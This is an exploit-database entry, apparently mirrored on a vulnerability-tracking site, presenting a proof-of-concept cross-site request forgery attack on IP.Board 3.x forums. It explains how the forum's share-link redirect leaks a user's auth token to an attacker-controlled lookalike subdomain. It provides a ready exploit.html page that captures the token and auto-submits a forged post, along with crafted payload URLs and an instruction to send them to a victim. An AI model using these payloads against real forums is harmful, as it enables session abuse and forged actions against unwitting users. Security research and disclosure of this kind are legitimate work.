Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Invision Power Board (IP.Board) 3.x - Cross-Site Request Forgery / Token Hjiacking

🗓️ 07 Sep 2014 00:00:00Reported by Piotr S.Type 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 29 Views

IP.Board 3.x CSRF vulnerability allows token hijacking and Cross-Site Request Forgery attack via malicious subdomain redirect and crafted payloa

Code
#Title: IP Board 3.x CSRF - Token hjiacking
#Date: 03.09.14
#Version: <= 3.4.6
#Vendor: invisionpower.com
#Author: Piotr S.
#Video-PoC: https://www.youtube.com/watch?v=G5P21TA4DjY
 
 
1) Introduction
 
Latest and propabbly previous IPB verions suffers on vulnerability, which allows attacker to steal CSRF token of specific user. Function, which allows users to share forum links, does not properly sanitize user input. Mentioned token is attached in request as GET parameter, so it's able to obtain it if user will be redirected to evil domain. Using the token, it is able to perform various operations as demonstrated in attached video.
 
 
2) PoC
 
Let's take a closer look at following url:
 
http://community.invisionpower.com/index.php?sharelink=print;aHR0cDovL2NvbW11bml0eS5pbnZpc2lvbnBvd2VyLmNvbS9mb3J1bS5waHA/aWQ9MjMzNQ==
 
At first glance you can notice b64 string, after decoding it, you may see following address:
http://community.invisionpower.com/forum.php?id=2334
 
In this case, user should be redirected to default domain of the forum - community.invisionpower.com; it is able to bypass protection in this redirect, by creating particular subdomain on attacker website. it needs to contain address of victim forum otherwise it won't work.
 
Request:
GET /index.php?sharelink=print;aHR0cDovL2NvbW11bml0eS5pbnZpc2lvbnBvd2VyLmNvbS54b3JiLnBsL2V4cGxvaXQuaHRtbA== HTTP/1.1
Host: community.invisionpower.com
 
Response:
302
Location: http://community.invisionpower.com.xorb.pl/exploit.html?forcePrint=1&_k=161cc4d2d5503fdb483979f9c164b4d3
 
Token is delivered as value of GET _k parameter. File to which user is redirected contains javascript, which grabs token that will be used in CSRF request.
 
 
3) Reproduction
 
a) Create subdomain
 
http://forum.victim_site.com.your_domain.pl
 

b) Then, create file exploit.html with this content:
 
<html>
    <head>
        <script>
            onload = function ipboard(){var token = window.location.hash.split('=')[2];document.getElementById('tokens').value=token;};function fo(){document.ipboards.submit();}; setTimeout("fo()",1500);
        </script>
    </head>
    <body>
    <form action="http://a10089.try.invisionpower.com/index.php?" method="POST" id="ipboards" name="ipboards" enctype="multipart/form-data">
      <input type="hidden" name="TopicTitle" value="hacked!" />
      <input type="hidden" name="isRte" value="0" />
      <input type="hidden" name="noSmilies" value="0" />
      <input type="hidden" name="Post" value="IPboard 3.x 0day" />
      <input type="hidden" name="ipsTags" value="
" />
      <input type="hidden" name="enableemo" value="yes" />
      <input type="hidden" name="enablesig" value="yes" />
      <input type="hidden" name="st" value="0" />
      <input type="hidden" name="app" value="forums" />
      <input type="hidden" name="module" value="post" />
      <input type="hidden" name="section" value="post" />
      <input type="hidden" name="do" value="new_post_do" />
      <input type="hidden" name="s" value="x" />
      <input type="hidden" name="p" value="0" />
      <input type="hidden" name="t" value="
" />
      <input type="hidden" name="f" value="2" />
      <input type="hidden" name="parent_id" value="0" />
      <input type="hidden" name="attach_post_key" value="x" />
      <input type="hidden" id="tokens" name="auth_key" value="7xxx3e9" />
      <input type="hidden" name="removeattachid" value="0" />
      <input type="hidden" name="dosubmit" value="Post New Topic" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
<h1><b>IP Board 3.X PoC<br/>wait... ;)</b></h1>
    </body>
</html>
 
c) Create payload
 
http://community.invisionpower.com/index.php?sharelink=print;aHR0cDovL2ZvcnVtLnZpY3RpbV9zaXRlLmNvbS55b3VyX2RvbWFpbi5jb20vZXhwbG9pdC5odG1sIw==
 
Now send this payload to victim - see video PoC for better understand.
 
4) References
 
 - https://www.youtube.com/watch?v=G5P21TA4DjY
 - https://twitter.com/evil_xorb
 
 
Happy hacking!

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
07 Sep 2014 00:00Current
7.4High risk
Vulners AI Score7.4
ip.board 3.xcross-site request forgerytoken hijackingcsrf vulnerabilitysubdomain redirectmalicious payload
29